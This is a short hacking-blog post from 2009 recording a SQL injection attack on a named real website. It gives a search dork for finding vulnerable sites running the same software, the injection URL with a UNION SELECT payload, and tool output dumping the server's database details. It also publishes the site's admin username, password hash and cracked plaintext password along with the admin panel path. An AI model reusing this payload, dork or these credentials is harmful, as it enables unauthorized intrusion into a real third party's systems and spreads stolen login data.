viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, February 3, 2009

[SQLi] http://www.endonesia.org

5:51 PM Posted by viperfx07 No comments


Dork : "Powered by endonesia 8.4"
Tools: schemafuzz.py v5.0 mod by me
Admin panel: /admin
Admin usr/pwd : Endonesia:jatwar22

[+] URL:http://www.endonesia.org/mod.php?mod=publisher&op=viewarticle&cid=1&artid=2+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 17:46:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: endorg_endorg
User: endorg_endorg@localhost
Version: 5.0.67-community
[+] Dumping data from database "endorg_endorg" Table "authors"
[+] Column(s) ['aid', 'pwd']
[+] Number of Rows: 1

[0] Endonesia:ca1db2899cf4bb64cd1b67ea68140bcc

0 comments:

Post a Comment